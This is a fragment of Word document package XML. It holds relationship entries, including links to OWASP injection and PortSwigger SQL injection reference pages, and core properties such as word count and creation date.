                    <w:div w:id="18416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A03_2021-Injection/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-inj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3631</Words>
  <Characters>20701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2026-10-15T15:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-15T15:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>